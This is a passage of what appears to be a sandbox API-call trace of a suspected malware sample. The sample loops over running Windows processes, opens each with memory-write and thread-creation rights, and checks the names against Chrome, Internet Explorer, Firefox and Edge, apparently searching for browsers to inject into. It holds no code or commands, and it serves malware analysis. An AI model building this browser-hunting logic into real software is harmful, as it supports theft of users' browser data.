	[0239.482] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.482] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.482] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0239.483] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x80a4
	[0239.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.483] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0239.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.484] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.484] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0239.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.484] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.485] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.485] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x80a8
	[0239.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.486] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.486] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.486] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.486] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.487] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.487] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x80ac
	[0239.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.488] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.488] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.488] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.488] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.489] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0239.489] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x80b0
	[0239.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.490] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0239.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.490] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.490] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0239.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.490] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.490] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0239.491] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x80b4
	[0239.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.491] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.492] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.493] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.493] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.493] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0239.494] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x80b8
	[0239.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.494] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0239.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.494] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.495] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0239.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.495] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.495] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0239.496] CloseHandle (hObject=0x4fd0) returned 1
	[0239.496] Sleep (dwMilliseconds=0x64) 
	[0239.633] GetCurrentProcessId () returned 0x110
	[0239.633] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0239.636] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0239.637] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0239.637] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0239.638] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x80bc
	[0239.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.638] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0239.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.639] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.639] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0239.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.639] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.640] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0239.640] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x80c0
	[0239.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.641] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0239.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.641] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.641] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0239.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.641] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.642] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0239.642] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x80c4
	[0239.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.643] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0239.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.643] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.643] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0239.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.644] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.644] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0239.645] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x80c8
	[0239.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.645] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0239.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.645] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.646] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0239.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.646] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.646] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0239.647] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x80cc
	[0239.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.647] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0239.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.647] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.648] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0239.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.648] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.649] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0239.649] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x80d0
	[0239.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.649] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0239.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.650] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.650] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0239.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.651] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.651] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0239.652] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x80d4
	[0239.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.652] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0239.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.652] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.652] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0239.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.653] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.653] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0239.654] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x80d8
	[0239.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.654] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0239.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.654] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.654] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0239.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.655] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.655] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.656] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x80dc
	[0239.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.656] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.656] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.657] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.657] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.657] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.658] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x80e0
	[0239.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.658] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.658] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.659] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.659] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.659] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.660] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x80e4
	[0239.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.660] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.661] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.661] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.661] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.662] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.662] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x80e8
	[0239.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.663] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.663] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.664] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.664] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.664] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.665] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x80ec
	[0239.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.665] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.665] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.666] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.666] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.666] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.667] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x80f0
	[0239.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.667] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.668] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.668] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.668] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.669] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.669] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x80f4
	[0239.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.670] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.670] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.670] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.671] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.671] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0239.672] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x80f8
	[0239.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.672] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0239.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.672] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.672] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0239.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.673] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.673] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.674] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x80fc
	[0239.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.674] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.674] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.675] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.675] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.675] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0239.676] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x8100
	[0239.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.676] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
